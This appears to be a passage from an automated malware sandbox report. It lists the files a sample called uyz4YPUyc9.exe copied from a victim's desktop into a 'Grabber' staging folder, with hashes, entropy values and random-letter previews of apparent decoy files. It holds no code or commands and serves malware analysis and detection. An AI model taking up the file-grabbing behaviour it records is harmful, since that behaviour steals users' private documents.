ORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	true
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	true
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TTCBKWZYOC.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695507083990718
Encrypted:	false
SSDEEP:	24:QjvupLA8Rg2zRRjgGt3NjEIPTPpg8xIC5XVTaq8T77pQTI0++41E:QgLA0zR5gGt9jEGTR5zXuCTP7
MD5:	6D88D4A4BC7E23FFF4A04EC2CE2B4DB0
SHA1:	C37511CE25F91B44C9E676521E4292FFDAC7147E
SHA-256:	83DC936A36BAA847BD6781CAC0E35006D015860E605B4C26D237E98D13F1908A
SHA-512:	69D76EE3CD91D6B4017312EFD7AA7E084D77D12A8D755CED06EC5C63E6F65262C70199D59151518E34BD6FF8547814724A9BBC63E34742E63F1887BC2BBB2BC4
Malicious:	false
Preview:	UQMPCTZARJFQTUFASTDSOZFLYRXCRKHVOJHYEKAKSJUWEVRKEEHCHPKWPEGNZIZTDIXUBUAFKBDOCCZIPOHGRBVURECWKRUQUOUYFYIUMHCIFKYDLKRSLRMQSZCCHCQTYCAJBIWSRLGLFHPRYQXSMIWVCULYKJGGGJCNVKWJYGBFHMFJLGDWHEBLVQELUPFAEDLGWLIYRFVOLPSGBOOWXATLCJBFUWTROEMRAMGOVEQKCNJFPARYQODRQVWJREDFQAVFXAXQUOFYBKAVYLFWLISVPMAMBKXYNIIHLYGICEPIHLCYULQSUQZMQKWUNRLOBKCTUXYPCLEGWBFUUBSLTLMIAZTIZRCKCPGPOVEVGCNQALQWJUZEWEADOUEECTWCPQBABNXRHBMDCYFWKNTJULTLPELWGANIENXFHRZEDIRITPFUKUVDJJESKDCFVNLQNVDGTOJWCJOOMJDRVLILHRTYJGMUSKTYLJBJFFGYGHLNSJODHZPIYPTJXFEFSYAIBKVTHVGOHNGUYSJLROXGPTNXNEWDYRXSJKDLQCESKVDPTEPJXQSQOGVLGWSHODSNVEQXEBIBZBQDZCRLBLSLYYTZYPCEUWJBUFRIBPYBIJXURCOFBVAMUHYFLJNDCOVIRXBJWRKSMZCWZGUZGAKJMWNQZHQWDXQHBUSCRBGZJEEYRZKNPKEDMWSRIUSWEVSCEYMGSRPFIWGTSTAGTIZVOURKQAHNNKNZFCYOYDNXQRFUDYBZZQRBAIHULYWRSSDCNGYITPPSJJVESDGBSDCPARCPYYFLZFKGRVGMHERPXKDGRXBVCFAMWFQLPZRHVNCIGTHLJYYNMXFTWOKFUGHHVLMJIAPDXBPZWJQADSYARMTUGFGYSOWKFOWTTHRMVDZYEOBJOMCEBCNXURWARWUVMREPQLASVZYXMGMQSSAZYVJXBROVGKGAVIGJWDLFJTASGHWAVHMWWBTHBBULSSCYTUPRYPVAEMBCREUGEJPA

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\IVHSHTCODI.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\JDSOXXXWOA.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\TTCBKWZYOC.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\UQMPCTZARJ.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695507083990718
Encrypted:	false
SSDEEP:	24:QjvupLA8Rg2zRRjgGt3NjEIPTPpg8xIC5XVTaq8T77pQTI0++41E:QgLA0zR5gGt9jEGTR5zXuCTP7
MD5:	6D88D4A4BC7E23FFF4A04EC2CE2B4DB0
SHA1:	C37511CE25F91B44C9E676521E4292FFDAC7147E
SHA-256:	83DC936A36BAA847BD6781CAC0E35006D015860E605B4C26D237E98D13F1908A
SHA-512:	69D76EE3CD91D6B4017312EFD7AA7E084D77D12A8D755CED06EC5C63E6F65262C70199D59151518E34BD6FF8547814724A9BBC63E34742E63F1887BC2BBB2BC4
Malicious:	false
Preview:	UQMPCTZARJFQTUFASTDSOZFLYRXCRKHVOJHYEKAKSJUWEVRKEEHCHPKWPEGNZIZTDIXUBUAFKBDOCCZIPOHGRBVURECWKRUQUOUYFYIUMHCIFKYDLKRSLRMQSZCCHCQTYCAJBIWSRLGLFHPRYQXSMIWVCULYKJGGGJCNVKWJYGBFHMFJLGDWHEBLVQELUPFAEDLGWLIYRFVOLPSGBOOWXATLCJBFUWTROEMRAMGOVEQKCNJFPARYQODRQVWJREDFQAVFXAXQUOFYBKAVYLFWLISVPMAMBKXYNIIHLYGICEPIHLCYULQSUQZMQKWUNRLOBKCTUXYPCLEGWBFUUBSLTLMIAZTIZRCKCPGPOVEVGCNQALQWJUZEWEADOUEECTWCPQBABNXRHBMDCYFWKNTJULTLPELWGANIENXFHRZEDIRITPFUKUVDJJESKDCFVNLQNVDGTOJWCJOOMJDRVLILHRTYJGMUSKTYLJBJFFGYGHLNSJODHZPIYPTJXFEFSYAIBKVTHVGOHNGUYSJLROXGPTNXNEWDYRXSJKDLQCESKVDPTEPJXQSQOGVLGWSHODSNVEQXEBIBZBQDZCRLBLSLYYTZYPCEUWJBUFRIBPYBIJXURCOFBVAMUHYFLJNDCOVIRXBJWRKSMZCWZGUZGAKJMWNQZHQWDXQHBUSCRBGZJEEYRZKNPKEDMWSRIUSWEVSCEYMGSRPFIWGTSTAGTIZVOURKQAHNNKNZFCYOYDNXQRFUDYBZZQRBAIHULYWRSSDCNGYITPPSJJVESDGBSDCPARCPYYFLZFKGRVGMHERPXKDGRXBVCFAMWFQLPZRHVNCIGTHLJYYNMXFTWOKFUGHHVLMJIAPDXBPZWJQADSYARMTUGFGYSOWKFOWTTHRMVDZYEOBJOMCEBCNXURWARWUVMREPQLASVZYXMGMQSSAZYVJXBROVGKGAVIGJWDLFJTASGHWAVHMWWBTHBBULSSCYTUPRYPVAEMBCREUGEJPA

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\XQACHMZIHU.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
